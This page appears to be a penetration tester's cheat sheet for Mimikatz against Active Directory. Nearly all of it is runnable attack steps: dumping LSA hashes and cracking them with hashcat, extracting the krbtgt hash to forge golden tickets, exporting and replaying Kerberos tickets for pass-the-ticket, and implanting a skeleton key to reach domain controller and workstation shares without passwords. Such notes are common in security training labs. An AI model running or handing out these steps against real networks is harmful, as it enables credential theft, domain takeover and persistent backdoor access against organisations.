MimiKatz
Last updated
Last updated
Used for dumping user credentials inside of a active directory network
Summary
cd Downloads && mimikatz.exe this will cd into the directory that mimikatz is kept as well as run the mimikatz binary
privilege::debug ensure that the output is "Privilege '20' ok" - This ensures that you're running mimikatz as an administrator; if you don't run mimikatz as an administrator, mimikatz will not run properly
lsadump::lsa /patch Dump those hashes!
Crack those hashes w/ hashcat
hashcat -m 1000 <hash> rockyou.txt
We will first dump the hash and sid of the krbtgt user then create a golden ticket and use that golden ticket to open up a new command prompt allowing us to access any machine on the network.
cd downloads && mimikatz.exe
privilege::debug ensure this outputs [privilege "20" ok]
lsadump::lsa /inject /name:krbtgt This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket
kerberos::golden /user: /domain: /sid: /krbtgt: /id:
misc::cmd - This will open a new command prompt with elevated privileges to all machines
Access other Machines! - You will now have another command prompt with access to all other machines on the network
If a password of a service account is stolen, it can be used to impersonate a user
Pass the ticket works by dumping the TGT from the LSASS memory of the machine.
cd Downloads - navigate to the directory mimikatz is in
mimikatz.exe - run mimikatz
privilege::debug - Ensure this outputs [output '20' OK] if it does not that means you do not have the administrator privileges to properly run mimikatz
sekurlsa::tickets /export - this will export all of the .kirbi tickets into the directory that you are currently in
At this step you can also use the base 64 encoded tickets from Rubeus that we harvested earlier
Take the admin one
Now that we have the ticket, we can perform a pass the ticket attack kerberos::ptt <ticket> - run this command inside of mimikatz with the ticket that you harvested from earlier. It will cache and impersonate the given ticket
klist - Here were just verifying that we successfully impersonated the ticket by listing our cached tickets.
You now have impersonated the ticket giving you the same rights as the TGT you're impersonating. To verify this we can look at the admin share.
The skeleton key works by abusing the AS-REQ encrypted timestamps, the timestamp is encrypted with the users NT hash. The domain controller then tries to decrypt this timestamp with the users NT hash, once a skeleton key is implanted the domain controller tries to decrypt the timestamp using both the user NT hash and the skeleton key NT hash allowing you access to the domain forest.
cd Downloads && mimikatz.exe - Navigate to the directory mimikatz is in and run mimikatz
privilege::debug - This should be a standard for running mimikatz as mimikatz needs local administrator access
Installing Skeleton Key
misc::skeleton
Accessing the forest Example : net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz - The share will now be accessible without the need for the Administrators password
dir \\Desktop-1\c$ /user:Machine1 mimikatz - access the directory of Desktop-1 without ever knowing what users have access to Desktop-1
